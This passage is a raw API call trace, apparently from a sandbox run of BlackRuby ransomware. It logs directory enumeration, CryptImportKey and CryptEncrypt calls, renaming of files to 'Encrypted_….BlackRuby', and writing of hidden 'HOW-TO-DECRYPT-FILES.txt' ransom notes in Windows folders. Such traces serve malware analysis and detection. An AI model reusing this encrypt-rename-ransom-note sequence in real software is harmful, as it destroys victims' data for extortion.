ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x24c3b160, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5400)) returned 1 [0047.912] GetLastError () returned 0xb7 [0047.912] SetErrorMode (uMode=0x0) returned 0x1 [0047.912] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_cqsQJP9m7nstmRPPJhrvKOLNavu8D1ODjWgW1FlujNfACYF.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\encrypted_cqsqjp9m7nstmrppjhrvkolnavu8d1odjwgw1flujnfacyf.blackruby")) returned 1 [0047.912] GetLastError () returned 0xb7 [0047.913] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.913] GetLastError () returned 0xb7 [0047.913] SetErrorMode (uMode=0x1) returned 0x0 [0047.913] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.913] GetLastError () returned 0x5 [0047.914] SetErrorMode (uMode=0x0) returned 0x1 [0047.914] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.cab", lpFilePart=0x0) returned 0x4b [0047.914] GetLastError () returned 0x5 [0047.914] SetErrorMode (uMode=0x1) returned 0x0 [0047.914] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c5b7b4 | out: lpFileInformation=0x1c5b7b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77ac8800, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x77ac8800, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x9f0f5220, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x956c3de)) returned 1 [0047.914] GetLastError () returned 0x5 [0047.914] SetErrorMode (uMode=0x0) returned 0x1 [0047.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.915] GetLastError () returned 0x5 [0047.915] SetErrorMode (uMode=0x1) returned 0x0 [0047.915] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.915] GetLastError () returned 0x5 [0047.916] SetErrorMode (uMode=0x0) returned 0x1 [0047.916] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.msi", lpFilePart=0x0) returned 0x4b [0047.916] GetLastError () returned 0x5 [0047.916] SetErrorMode (uMode=0x1) returned 0x0 [0047.916] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c79524 | out: lpFileInformation=0x1c79524*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8075fb60, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x8075fb60, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x9e6185f0, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x93f000)) returned 1 [0047.919] GetLastError () returned 0x5 [0047.919] SetErrorMode (uMode=0x0) returned 0x1 [0047.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.920] GetLastError () returned 0x5 [0047.920] SetErrorMode (uMode=0x1) returned 0x0 [0047.920] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.920] GetLastError () returned 0x5 [0047.921] SetErrorMode (uMode=0x0) returned 0x1 [0047.921] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0047.921] GetLastError () returned 0x5 [0047.921] SetErrorMode (uMode=0x1) returned 0x0 [0047.921] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c97294 | out: lpFileInformation=0x1c97294*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80bfae90, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80bfae90, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x9e6185f0, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x22d5)) returned 1 [0047.921] GetLastError () returned 0x5 [0047.921] SetErrorMode (uMode=0x0) returned 0x1 [0047.921] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0047.922] GetLastError () returned 0x5 [0047.922] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0047.922] GetLastError () returned 0x5 [0047.922] SetErrorMode (uMode=0x1) returned 0x0 [0047.922] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.922] GetLastError () returned 0x0 [0047.922] GetFileType (hFile=0x184) returned 0x1 [0047.922] SetErrorMode (uMode=0x0) returned 0x1 [0047.922] GetFileType (hFile=0x184) returned 0x1 [0047.922] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x22d5 [0047.922] GetLastError () returned 0x0 [0047.922] ReadFile (in: hFile=0x184, lpBuffer=0x1c98f28, nNumberOfBytesToRead=0x22d5, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c98f28*, lpNumberOfBytesRead=0x18ed84*=0x22d5, lpOverlapped=0x0) returned 1 [0047.923] GetLastError () returned 0x0 [0047.923] CloseHandle (hObject=0x184) returned 1 [0047.923] GetLastError () returned 0x0 [0047.923] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0047.923] GetLastError () returned 0x0 [0047.923] SetErrorMode (uMode=0x1) returned 0x0 [0047.923] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80bfae90, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80bfae90, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x9e6185f0, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x22d5)) returned 1 [0047.923] GetLastError () returned 0x0 [0047.923] SetErrorMode (uMode=0x0) returned 0x1 [0047.934] CryptImportKey (in: hProv=0x37c790, pbData=0x1cf78b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b20) returned 1 [0047.934] GetLastError () returned 0x0 [0047.934] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.934] GetLastError () returned 0x0 [0047.939] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.939] GetLastError () returned 0x0 [0047.939] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360de0) returned 1 [0047.939] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.939] GetLastError () returned 0x0 [0047.939] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1d24904*=0x1, dwFlags=0x0) returned 1 [0047.939] GetLastError () returned 0x0 [0047.940] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1d248d0, dwFlags=0x0) returned 1 [0047.940] GetLastError () returned 0x0 [0047.940] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d2494c*, pdwDataLen=0x18ed74*=0x23d0, dwBufLen=0x23d0 | out: pbData=0x1d2494c*, pdwDataLen=0x18ed74*=0x23d0) returned 1 [0047.940] GetLastError () returned 0x0 [0047.940] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d29118*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d29118*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.940] GetLastError () returned 0x0 [0047.940] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d29148*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d29148*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.940] GetLastError () returned 0x0 [0047.940] CryptDestroyKey (hKey=0x360b20) returned 1 [0047.940] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.940] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.940] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml", lpFilePart=0x0) returned 0x4b [0047.940] GetLastError () returned 0x0 [0047.940] SetErrorMode (uMode=0x1) returned 0x0 [0047.941] GetFileType (hFile=0x184) returned 0x1 [0047.941] GetFileType (hFile=0x184) returned 0x1 [0047.942] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_oB8PUBFRyTIW3q9TlNsAXs1SSEJF9uj0HANsFrx.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\encrypted_ob8pubfrytiw3q9tlnsaxs1ssejf9uj0hansfrx.blackruby")) returned 1 [0047.943] GetLastError () returned 0xb7 [0047.945] SetErrorMode (uMode=0x0) returned 0x1 [0047.945] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.948] GetLastError () returned 0x5 [0047.948] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.948] GetLastError () returned 0x5 [0047.948] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.948] GetLastError () returned 0x5 [0047.948] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.948] GetLastError () returned 0x12 [0047.948] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.948] SetErrorMode (uMode=0x0) returned 0x1 [0047.948] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0047.948] GetLastError () returned 0x12 [0047.948] SetErrorMode (uMode=0x1) returned 0x0 [0047.949] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.949] GetLastError () returned 0x12 [0047.949] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.949] GetLastError () returned 0x12 [0047.949] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.949] GetLastError () returned 0x12 [0047.949] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.949] GetLastError () returned 0x12 [0047.949] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.949] SetErrorMode (uMode=0x0) returned 0x1 [0047.949] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", lpFilePart=0x0) returned 0x30 [0047.949] GetLastError () returned 0x12 [0047.949] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.949] GetLastError () returned 0x12 [0047.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.949] GetLastError () returned 0x12 [0047.949] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", lpFilePart=0x0) returned 0x30 [0047.950] GetLastError () returned 0x12 [0047.950] SetErrorMode (uMode=0x1) returned 0x0 [0047.950] FindFirstFileW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.950] GetLastError () returned 0x12 [0047.950] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.950] GetLastError () returned 0x12 [0047.950] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.950] GetLastError () returned 0x12 [0047.950] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.950] GetLastError () returned 0x12 [0047.951] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.951] GetLastError () returned 0x12 [0047.951] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.951] SetErrorMode (uMode=0x0) returned 0x1 [0047.951] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae", lpFilePart=0x0) returned 0x30 [0047.951] GetLastError () returned 0x12 [0047.951] SetErrorMode (uMode=0x1) returned 0x0 [0047.951] FindFirstFileW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.951] GetLastError () returned 0x12 [0047.951] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.951] GetLastError () returned 0x12 [0047.951] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.951] GetLastError () returned 0x12 [0047.951] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.951] GetLastError () returned 0x12 [0047.952] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.952] GetLastError () returned 0x12 [0047.952] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.952] SetErrorMode (uMode=0x0) returned 0x1 [0047.952] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\boot.sdi", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\boot.sdi", lpFilePart=0x0) returned 0x39 [0047.952] GetLastError () returned 0x12 [0047.952] SetErrorMode (uMode=0x1) returned 0x0 [0047.952] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\boot.sdi" (normalized: "c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\boot.sdi"), fInfoLevelId=0x0, lpFileInformation=0x1b53854 | out: lpFileInformation=0x1b53854*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x8396470, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8396470, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000)) returned 1 [0047.952] GetLastError () returned 0x12 [0047.952] SetErrorMode (uMode=0x0) returned 0x1 [0047.953] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x49 [0047.953] GetLastError () returned 0x12 [0047.953] SetErrorMode (uMode=0x1) returned 0x0 [0047.953] CreateFileW (lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.953] GetLastError () returned 0x0 [0047.953] GetFileType (hFile=0x184) returned 0x1 [0047.953] SetErrorMode (uMode=0x0) returned 0x1 [0047.953] GetFileType (hFile=0x184) returned 0x1 [0047.953] WriteFile (in: hFile=0x184, lpBuffer=0x1b6f4c4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b6f4c4*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0047.954] GetLastError () returned 0x0 [0047.954] CloseHandle (hObject=0x184) returned 1 [0047.954] GetLastError () returned 0x0 [0047.954] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x49 [0047.954] GetLastError () returned 0x0 [0047.954] SetFileAttributesW (lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.955] GetLastError () returned 0x0 [0047.955] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\Winre.wim", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\Winre.wim", lpFilePart=0x0) returned 0x3a [0047.955] GetLastError () returned 0x0 [0047.955] SetErrorMode (uMode=0x1) returned 0x0 [0047.955] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\Winre.wim" (normalized: "c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\winre.wim"), fInfoLevelId=0x0, lpFileInformation=0x1b71198 | out: lpFileInformation=0x1b71198*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x630b7f58, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x6320f482, ftLastAccessTime.dwHighDateTime=0x1ca0453, ftLastWriteTime.dwLowDateTime=0x7093668f, ftLastWriteTime.dwHighDateTime=0x1ca0430, nFileSizeHigh=0x0, nFileSizeLow=0x8a21081)) returned 1 [0047.959] GetLastError () returned 0x0 [0047.959] SetErrorMode (uMode=0x0) returned 0x1 [0047.959] GetFullPathNameW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x49 [0047.959] GetLastError () returned 0x0 [0047.959] SetErrorMode (uMode=0x1) returned 0x0 [0047.959] CreateFileW (lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.959] GetLastError () returned 0x5 [0047.961] SetErrorMode (uMode=0x0) returned 0x1 [0047.961] GetFullPathNameW (in: lpFileName="C:\\System Volume Information", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\System Volume Information", lpFilePart=0x0) returned 0x1c [0047.961] GetLastError () returned 0x5 [0047.961] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.961] GetLastError () returned 0x5 [0047.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.961] GetLastError () returned 0x5 [0047.961] GetFullPathNameW (in: lpFileName="C:\\System Volume Information", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\System Volume Information", lpFilePart=0x0) returned 0x1c [0047.961] GetLastError () returned 0x5 [0047.961] SetErrorMode (uMode=0x1) returned 0x0 [0047.961] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0047.961] GetLastError () returned 0x5 [0047.963] SetErrorMode (uMode=0x0) returned 0x1 [0047.963] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0047.963] GetLastError () returned 0x5 [0047.963] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.963] GetLastError () returned 0x5 [0047.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.963] GetLastError () returned 0x5 [0047.963] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0047.963] GetLastError () returned 0x5 [0047.963] SetErrorMode (uMode=0x1) returned 0x0 [0047.963] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0047.963] GetLastError () returned 0x5 [0047.963] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.963] GetLastError () returned 0x5 [0047.963] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.963] GetLastError () returned 0x5 [0047.964] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: 